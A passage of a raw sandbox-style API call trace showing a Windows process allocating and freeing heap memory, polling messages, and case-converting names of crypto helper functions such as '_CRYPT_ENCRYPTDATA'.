hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0043.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0043.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0043.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14e60) returned 0x935008 [0043.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0043.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.157] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0043.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0043.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14e60) returned 0xac2018 [0043.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0043.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0043.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0043.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.157] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0043.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0043.157] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0043.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.157] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0043.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0043.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0043.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0043.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0043.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0043.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14e60) returned 0xac2018 [0043.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0043.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0043.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0043.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0043.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da318 [0043.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0043.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0043.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0043.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da178 [0043.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0043.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0043.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0043.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8895c8 [0043.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0043.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0043.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0043.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0043.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0043.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14e60) returned 0x949e70 [0043.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0043.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0043.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0043.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0043.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0043.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0043.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0043.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0043.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0043.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0043.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0043.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0043.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0043.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0043.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0043.160] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0043.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0043.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0043.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0043.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0043.160] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0043.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0043.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0043.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0043.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0043.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0043.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0043.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0043.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0043.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0043.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0043.160] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0043.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0043.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0043.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3c8 [0043.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0043.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0043.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0043.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0043.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c748 [0043.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0043.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0043.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0043.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0043.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0043.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0043.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0043.161] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0043.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0043.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0043.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0043.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0043.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0043.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0043.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0043.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0043.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0043.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0043.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0043.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0043.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0043.161] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0043.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0043.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0043.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0043.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0043.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0043.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0043.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0043.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0043.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0043.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0043.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0043.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0043.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0043.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0043.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0043.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0043.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0043.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0043.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0043.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0043.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0043.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0043.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.162] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0043.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0043.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0043.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0043.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0043.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0043.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0043.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0043.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0043.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0043.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0043.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0043.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0043.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0043.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0043.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0043.163] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0043.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0043.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0043.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0043.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0043.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0043.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0043.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0043.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0043.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.163] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0043.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c970 [0043.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0043.164] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0043.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0043.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0043.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0043.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0043.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0043.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0043.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0043.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0043.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0043.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0043.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0043.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0043.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0043.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0043.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0043.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0043.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0043.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0043.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0043.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0043.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0043.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0043.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0043.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0043.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0043.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0043.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0043.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0043.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0043.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0043.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0043.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0043.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0043.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0043.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 